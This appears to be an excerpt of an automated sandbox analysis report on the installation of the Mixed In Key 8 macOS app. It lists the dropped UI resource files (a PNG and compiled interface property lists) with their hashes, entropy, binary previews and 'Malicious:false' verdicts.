                                                                                                    SHA-256:AE14CDE5F78D9B650477A99A4AFE8D37C623496815F5A04616DA7CBC140DA14C
                                                                                                    SHA-512:809D58D02526FA46A26E3A66F49E3F5C90924DD9C0240AD1316738C5A0AD267CBE845897D7AA4BDF67B5A729CEED81A24D8246D5F96EEC61C23B8748DF474150
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR... ...,.............sRGB.........pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <tiff:YResolution>72</tiff:YResolution>. <tiff:Compression>5</tiff:Compression>. <tiff:XResolution>72</tiff:XResolution>. <xmp:CreatorTool>Flying Meat Acorn 5.6.4</xmp:CreatorTool>. <xmp:ModifyDate>2017-04-14T14:55:29</xmp:ModifyDate>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>...".....IDATX...=.. .....t....<.?S.. ..p.w=....".nM...&MCy.Q._...=(._.P.t..2......)...........\(6.%cr....B...u.X..i&-..CS.....Ro.Lf...=... .u]/...|2.....?@i.b[U..s.. ...............S..q..+(.k...I....Ix.......t.......0.k'&..{.W...B.....'| ..... .d....2...z ...|...Xv...T......^Q.S./.......IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_CT7Cg2
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):24075
                                                                                                    Entropy (8bit):6.953822746320175
                                                                                                    Encrypted:false
                                                                                                    MD5:38A704AC2E457AFE66B6CECBF86F570A
                                                                                                    SHA1:C933512282FD5C3C163CA8A7D9751523EB1A01DD
                                                                                                    SHA-256:5A171A79DBB260DDB9F496EA20D4D4067F1B7946D110D8F6EF90FB49B6D2A507
                                                                                                    SHA-512:3A01962DE62316326643D6CDE48929B96328F396968E0F6172AB5C1C58D89F755102C2DAAF079BE3F7FDAF7D858E83DEDF208FBF87C333C2141F035FEC973817
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............].^X$versionX$objectsY$archiverT$top........u.......#.$.*...2.T.\.i.r.s.t.y.z.~..................................................................... .&.*...2.6.O.U.X.a.b.c.l.m.n.u.}.....................................C...............................................$.%.4.5.=.>.A.F.G.L.M.R.V._.`.g.h.q.r.y.z.........................................................................!.'.+.,./.2.3.6.G.H.I.L.W.X.Y.].f.g.l.n.q.............................................................................%.&.../.8.9.@.A.J.K.S.T.U.V.[.\.a.f.k.p.u.z.{.......................................................................U...".S.....i..................................................... .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.G.H.I...J.K.L.M.N.O.P.Q.R.S.T.W.ZU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsK
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_LqNgus
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):2596
                                                                                                    Entropy (8bit):6.68418379285922
                                                                                                    Encrypted:false
                                                                                                    MD5:824EEC5EF95D3AE19007A3DC5CF3E805
                                                                                                    SHA1:11C7D3F5DF48BBC26E1DFCABB45F38D28867F715
                                                                                                    SHA-256:0644F5C2738293071BD54A47E3A77BAAE24FB0D94E2113F2AD94B511BDFF1A0C
                                                                                                    SHA-512:6B1D396B676990D75A3282A9C7A669393476CDC89C3AD2E65EA6E9AFC2CA757A3946D1FEE626C8691AB5B6492E597D3B9083C9934E130D23E7F8E6E2A78061A4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.........X$versionX$objectsY$archiverT$top.......G...#$*.29AYlmnopqrstuvwxyz{|.}~.......N................................U$null.......................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....<.:.6.E...E.D.F.;. .!"[NSClassName...._..MIKTutorialController.%&'(Z$classnameX$classes^NSCustomObject.')XNSObject.+.,-ZNS.objects....%&/0\NSMutableSet./1)UNSSet.+.38.4567.../.1.3.5.:;<..>?@XNSSource]NSDestinationWNSLabel.....-...BCDEF.GHIJKLMNOPQRMTUVWUYGroupName_..UseBackForwardList[Preferences]NSNextKeyViewZAllowsUndoYFrameNameXNSvFlags_..NSNextResponder[NSFrameSize[NSDragTypes]NSNibTouchBar.........,..............+.Z-...[\]^_`abcdefghij.................................._..NeXT RTFD pasteboard type_..NeXT TIFF v4.0 pasteboard type_..NSFilenamesPboardType_.#Apple files promise pasteboard type_..Apple HTML pasteboard type_.*NeXT Rich Text Form
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_MEMzah
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):13020
                                                                                                    Entropy (8bit):6.743872054337381
                                                                                                    Encrypted:false
                                                                                                    MD5:A943B72CF9DAE5C269EDC81D9ADCA4BD
                                                                                                    SHA1:A775AA843DA8008C0ECB732B5D69F1DF8D305F5C
                                                                                                    SHA-256:1F643DDC939883C0544E1BAA0101DAC84519CC0A4DD6AB150A72390A84489492
                                                                                                    SHA-512:2A93E414583725CCA0BB8D2A7497D8B1012F316A4EDFCBAA68DD3F7F5395B830AEE5A30AE16277E496EDDE48996D06653F0E392E86B80D8D27C92BA53FDCFB95
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............M.NX$versionX$objectsY$archiverT$top...............#.$.*...2.<.D.a.b.c.d.l.m.p.....................................................................................$.%.&.3.4.8.9.C.D.E.M.U.Y.].a.d.i.n.t.~.....................................................................!.".(...3.8.=.B.H.N.S.X.].~.b.f.g.o.p.t.y.z.....................g.......@.....&.D.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.?.@.A.B.C.D.G.JU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._.,_TtC10MixedInKey26BetaFeedbackViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.;..4.5.6.7.8.9.:...../.........5....=.>.?.@.A.B.CZNSKeyPathsXNSObjectXNSValues............E.F.G.H.I.J.K.L.M.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_Ov6nIC
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):4245
                                                                                                    Entropy (8bit):6.463560915414473
                                                                                                    Encrypted:false
                                                                                                    MD5:4C9B9A447237B3618379294113A94747
                                                                                                    SHA1:4902A691EE7EC0A5F4C5646F09845C37B94BE195
                                                                                                    SHA-256:7E1EBBEFB55DD3D933187F73741CE6052CBD9B7D0A1CCDC836ECD0C88CD5F659
                                                                                                    SHA-512:DB7D9D250228EF4B7EA74E308B2C41C55FB91490100D3BD3DADEB61E0777AEAA1A21C1FD2E5CC37BBE8AC4496CE6C5FDE9326F12633E63E4D4D5FE5597EF0F52
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............u.vX$versionX$objectsY$archiverT$top.......W.......#.$.*...2.8.@.O.S.d.g.k.l........................................................................................... .+.,.-...2.=.@.A.L.[.{.....}.............j.k.l.o.rU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....G.E.B.U...U.T.V.F.. ...!."[NSClassName...._.&MIKSegmentEnergySelectorViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.7..4.5.6...:.=....9.:.;.....=.>.?XNSSource]NSDestinationWNSLabel.....8.9.... .A.B.C.D.E.F.G.H.I.J.K.L.J.NZNSSubviews_..NSNextResponder_..NSViewConstraintsXNSvFlags]NSNibTouchBar[NSFrameSize.7.6...../.........+...P.7..Q......T.U.V...A.B.W.X.E.D.Y.Z.[.\.].^.=.=.a.J.L.aVNSCellWNSFrame_..NSAllowsLogicalLayoutDirect
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_QBgVq0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):34970
                                                                                                    Entropy (8bit):6.785635251290525
                                                                                                    Encrypted:false
                                                                                                    MD5:413233CA73AE35CCFF9DE98D1B5EF3FC
                                                                                                    SHA1:3FCB124B3BE42185A8F7A3D59C603EF1FE2A1E06
                                                                                                    SHA-256:2CD5B0D5A3CD10461E0FBCEF2CABFA056897E851D30042CD347544332B71A399
                                                                                                    SHA-512:3300FA96FA73960F46D7E3F47EFAD3D38072422935CBDDEE4D78F403801B866659C8471452227C9B0E9FBF4F0C9B76CFB49799132723C1E6E783572B299FBF57
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............h.iX$versionX$objectsY$archiverT$top........?.......#.$.*...2.J.R.o.p.q.r.z.{.~...................................................................<.=.>.Q.T.W.X.b.c.d.n.o.v...............................................................".).*.1.2.5.<.?.D.E...J.S.T.d.e.h.k.t.u.y.z............................................................................... .%.0.1.2.:.;.?.@.C.N.O.Z.[.\.]._.k.n.o.z.{.|.................................................................................................#...%.'.+.2.3.4.;.<.=.>.G.H.I.J.R.S.T.U.\.].^.e.f.g.n.o.p.q.x.y.z.{...........9...3."...4.5.6.7.8.9.:.;...<.=.>.?.@.A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..............m...m..=..>..... ...!."[NSClassName...._.!MIK
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_WnRBtv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):158947
                                                                                                    Entropy (8bit):6.70008238154239
                                                                                                    Encrypted:false
                                                                                                    MD5:FBD40BB1AACCE2363A6C6FAFE61238C3
                                                                                                    SHA1:D927F95582B5333559F4B5943C14D055F994028C
                                                                                                    SHA-256:2DB08D38469B35B4EDAF6AFA85FF0197903775AEA39759EE0817BCF27103D360
                                                                                                    SHA-512:64DE4E13DE1574E148255F48AB413DE0AC44AA9240590321A14D9DBA8BF395B36BE6953CAAAF3EBC3BC2530287150D5B7375A2EFABF9B40C8C8E72944F7282D1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00............./2/3X$versionX$objectsY$archiverT$top................#.$.*...2...'.A.B.C.D.L.M.P.T.U.X.Y.Z.].b.c.d.g.l.m.n.q.v............................................................................................... .!.&.'.(.-.7.8.9.C.H.I.J.O.P.Q.V.c.d.e.j.k.y.|...................................................................................!.&.'.(.-.../.4.>.?.@.I.N.O.P.U.V.W.\.f.g.h.q.v.w.x.}.~.....................................................................................................".#.$.).*.+.0.1.2.7.@.A.B.G.H.I.N.O.P.U._.`.a.j.o.p.q.v.w.x.}................................................................................. .%.../.4.5.6.;.<.=.B.K.L.M.R.S.T.Y.Z.[.`.i.j.k.p.q.r.w.x.y.~.................................................................................................!.".#.(.1.2.7.8.9.>.?.@.E.N.O.P.U.V.W.\.].^.c.l.m.n.s.t.u.z.{.|....................................................................................................... .%.&.'.,.-...3.<.=.>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_XP6Y44
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11128
                                                                                                    Entropy (8bit):6.7284268766779185
                                                                                                    Encrypted:false
                                                                                                    MD5:67450DCFA35B509BD3FA136BE9638832
                                                                                                    SHA1:278B285C97FF57B1CDF356FCBA1397D66ACA2200
                                                                                                    SHA-256:06AD2D5847B7AF7FA41C70E84970D68A640EDAE9A9C4D99F952140C69571E67D
                                                                                                    SHA-512:62E9B75AF5BFB3D586EF3C3CF5F48E12CEDF939ADB629E8FFC6EE68B744A96F1D2AE0EEB7BD26E92760ED53456BB59BBACF714F9DC566EAC9BCF5400D4D03A92
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............b.cX$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.T.U.V.c.d.g.m.n.o.p.s.y.z.{.|........................................................... .!.*.8.9.C.D.N.O.P.X.`.d.h.l.o.s.x.}.~...................................................................................,.....F.G.K.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.\._U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....s.q.n...........r.. ...!."[NSClassName...._.*_TtC10MixedInKey24AddFilesWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;.....).1.f.h.k.l.K....>.?.@.A.B.C.DZNSKeyPathsXNSObjectXNSValues..........F.G. ...H.I.J.K.L.M.N.O.P.P.R.S_..NSOriginalClassNameWNSFrame_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTo
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_Y4zNpG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):14864
                                                                                                    Entropy (8bit):6.572123617273071
                                                                                                    Encrypted:false
                                                                                                    MD5:B93DD54C844528F00558593DB22E19E7
                                                                                                    SHA1:4748ABC7C3259B4D327A654AC35A1F079C56B8E5
                                                                                                    SHA-256:F3CF1864096177B284244B6A79A62C7223DB0202EFDEA5440D35A92A2F5A3026
                                                                                                    SHA-512:F4B7A696E1A435A52CF41DE7CBD699B277DDC58106286B45A6440846EFC6C9A9A885749B6158A3C9BA2C442CF8D0FFB900DBBFB9554E9F7F63BE55E808B57C55
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00............../.0X$versionX$objectsY$archiverT$top...............#.$.*...2.C.K.h.i.j.k.s.t.w...................................................................................#.*.+.,.1.2.6.;.G.H.P.S.V.W.X.].}.~............................................................................................./.3.7.8.9.:.?.@.D.K.L.M.P.U.V.b.f.j.k.l.m.v.w...y.|.....................................x............................................... .!.".#.$.%.&.).,U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._. MIKPianoKeyboardWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.B..4.5.6.7.8.9.:.;.<.=.>.?.@.A.....9.@.H.q.s..............."....D.E.F.G.H.I.JZNSKeyPathsXNSObj
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_abvFWL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):1780
                                                                                                    Entropy (8bit):6.653688302442843
                                                                                                    Encrypted:false
                                                                                                    MD5:159E1B9C06AFE6D91733E96364910CCE
                                                                                                    SHA1:CF5112F5B2A716B815A84329935622DF640C1C29
                                                                                                    SHA-256:AC544DD68364AA36733460B705A5B51842FADF1D270915AEF3CC51F03C872C62
                                                                                                    SHA-512:0956F5A3EDE0B8FD7D2F6464D2E93C915097E42FCCDFD76D58B78B0A0EFD6BA4BB9BC4DD4ED1B2FDC79F828DA05BCE1EF00E4A9129AF51A37E4879622041FDAF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.........X$versionX$objectsY$archiverT$top.......-...#$*.28@MWXY^bcfjknvw{.....................U$null.......................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....". ...+...+.*.,.!. .!"[NSClassName...._.#MIKSegmentKeySelectorViewController.%&'(Z$classnameX$classes^NSCustomObject.')XNSObject.+.,-ZNS.objects....%&/0\NSMutableSet./1)UNSSet.+.37.456..........9:;<=>?ZNSKeyPathsXNSObjectXNSValues..........A BCDEFGHIIKLWNSFrame_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTouchBar................. NBDEOFQRLTLVZNSSubviews[NSFrameSize..............._..{{20, 20}, {250, 250}}_..MIKCamelotControl.%&Z[\NSCustomView.Z\])VNSView[NSResponder.+._a.`......%&deWNSArray.d).+.ga.h...._..hasLightBackground.%&lm_.)NSIBUserDefinedRuntimeAttributesConnector.l).opq..>tuXNSSource]NSDestinationWNSLabel........\camelotWheel.%&xy_..NSNibOutletConnector.xz)^NSN
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_hvNw1J
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):13596
                                                                                                    Entropy (8bit):6.749410708789081
                                                                                                    Encrypted:false
                                                                                                    MD5:DA57336B3C23A780C00412ED727211B5
                                                                                                    SHA1:F86E05C8A9B000819FBC3795D2E6D1B317073326
                                                                                                    SHA-256:648C8E814624A43CEFF164923EDB4FA3034D5B56641DEE5B593D262431E133FC
                                                                                                    SHA-512:8A64755BA1E01FC45145DD2F1A7A0E39EF211F59F408E66B77979AF6A9306763BA42489EB54AAC02232C017181C2DCE146238F98B689E056DD5A838C46F8F67D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............p.qX$versionX$objectsY$archiverT$top...............#.$.*...2.<.D.S.[.`.u.x.|.......................................................................................#.(.0.5.?.@.H.I.L.O.].`.l.m.q.u.v.w.x.y.~.......................................................................-.0.<.=.A.E.F.G.H.I.N.V.[.e.f.n.o.r.u.................................................F.G...H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.c.d.e.f.g.j.mU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._.(_TtC10MixedInKey22SoftwareViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.;..4.5.6.7.8.9.:...;.N.V.i.|......=.>.?.....A.B.CXNSSource]NSDestinationWNSLabel.....9.:....E.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_lFvXYV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11538
                                                                                                    Entropy (8bit):6.718392996706715
                                                                                                    Encrypted:false
                                                                                                    MD5:94334FD194A49D8C386D910296B3D6AB
                                                                                                    SHA1:72408BC33AECE43688272C7D68580AA64E9DC88E
                                                                                                    SHA-256:C8FE397EA09FEFD43FA8FEDCF49DFD3400E0BF092069C4A76A575DA50B008CE5
                                                                                                    SHA-512:6E5874F729AA00410A56BDE88A6C338BD9BD2B03A1E29E3179A64A9E52245CAA5E7E6832A100127E9116DC73EC80E88C46A8F0B4C77E95A86E5B96B378986BFF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............o.pX$versionX$objectsY$archiverT$top...............#.$.*./.M.N.O.P.\.e.{.~.................................................................................!.+.,.5.6.:.;.H.K.L.M.a.b.f.g.j.m.y.|.}.................................................................................%.=.L.H...U.V...W.X.Y.Z.[.\.].^._.`.a.b.c.d.e.f.i.lU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys...Z.t.r.n...........s.. ...!."[NSClassName...._..MIKCollectionsArrayController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,..ZNS.objects..-........0.1.2.3.4.5.6.7.8...9.:.;.<.=.>.?.@.A.B.C.D.C.F.G.H.I.J.?.L\NSWindowRect_..NSUserInterfaceItemIdentifierYNSMaxSize]NSWindowTitle\NSWindowView_..NSMinFullScreenContentSize_..NSWindowIsRestorable_..NSMaxFullScreenContentSize\NSScreenRect_..NSWindowBa
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_laHObK
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):8291
                                                                                                    Entropy (8bit):6.563859398387655
                                                                                                    Encrypted:false
                                                                                                    MD5:58AEFCE1102099AB9D547751688F0978
                                                                                                    SHA1:20B7169AF931F5BACFF9F06C63B8D2DE3D787799
                                                                                                    SHA-256:843527F8B09FB1B214DC734891C0771947B6902ABC1D6D802AD39BD3CF429474
                                                                                                    SHA-512:D7C19706785F85FD041FD7B4E3F4EC1D3135B58C4B0DCDAE76E9F43DE3479C12BA065B1D568567F0A3442355DE0B0034E6D080FC2FEAD25982948B99E681D56A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............N.OX$versionX$objectsY$archiverT$top.......H.......#.$.*...2.7.?.N.O.T.f.g.h.x.y.................................................................................'.3.?.d...@.A...B.C.D.E.H.KU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....;.9.5.F...F.E.G.:.. ...!."[NSClassName...._..MIKTraktorAccessViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.6..4.5...2.&..8.9.:.....<.=.>XNSSource]NSDestinationWNSLabel.....0.1..@... .A.B.C.D.E.F.G.F.I.J.K.J.M_..NSOriginalClassNameZNSSubviews_..NSNextResponderXNSvFlags]NSNibTouchBar[NSFrameSize................/VNSView..+...P.6..Q.R...".&..U.V.W.X...B.Y.C.D.Z.[.\.].^._.`.<.<.K.J.d.eVNSCellWNSFrame_..NSAllowsLogicalLayoutDirection_..NSHuggingPriority[NSSup
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_libsAn
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):361061
                                                                                                    Entropy (8bit):6.827735719641945
                                                                                                    Encrypted:false
                                                                                                    MD5:8BD452C03DB79C1F57D6CB2D654709D6
                                                                                                    SHA1:CF30235132B127F49BC76F261D7B104B9BCCCCC7
                                                                                                    SHA-256:C759F88554AE877313D8C51D762D88FFDEAF8DE5342154F5C36BFDAAEF1F365A
                                                                                                    SHA-512:8DA0E50AFC2250EBA2C647ADC04CC932D6186712C2902DFCDAD7CBED478969AF18D9DB98E353C8748C826010F7736E04BD06AD6A5F28AE1931DD1D76EDFFC5C0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.............E.E.X$versionX$objectsY$archiverT$top................#.$.*...2.................!.;.>.?.@.A.D.H.I.L.P.Q.T.Y.d.e.f.t.x.y.}......................................................................... .!.-.&.*.+.0.;.<.=.I.J.N.O.S.X.b.c.d.q.u.v.z.......................................................................,./.;.<.=.>.?.@.A.B.C.D...E.F.P.V.W.X.[.^.a.b.c.h.i.l.q.r.s.x..................................................................................... .$.%.1.4.8.9.=.B.I.R.S.T.Z.[.a.b.c.h.r.s.t.......................................................................".#.'.,.5.9.D.E.O.P.T.W.X.Y.^.a.f.k.r.{.|.}......................................................................... .%./.0.=.A.B.F.K.O.^.a.m...n.r.v.w.x.y.~.............................................................................$.*.L.+.1.2.3.8.?.H.I.J.P.Q.W.X.Y.^.e.n.o.p.v.w.}.~...........................................................................).*.../.3.8.B.C.D.R.W.X.Y.^.f.i.j.k.o.t.u.~.......
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_rGRbU6
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18231
                                                                                                    Entropy (8bit):6.81074806346508
                                                                                                    Encrypted:false
                                                                                                    MD5:EA02D594C779CEFB5EFDC8687FFD6731
                                                                                                    SHA1:6AB8CCE28372075E29224521B74A682AB059FF84
                                                                                                    SHA-256:9D8018A045B6166FDB8352910B9C8E783F7DFC4A1039D015A47C66F34929D333
                                                                                                    SHA-512:C2869F048ED2807A5B84F77B61711010DBE1CFA16D7B1A46A473B4000A8CF14CA2A10C5489ED118B6CA45A248347E5D32981BA6012952D1DBB7CD51EF6D64A0E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
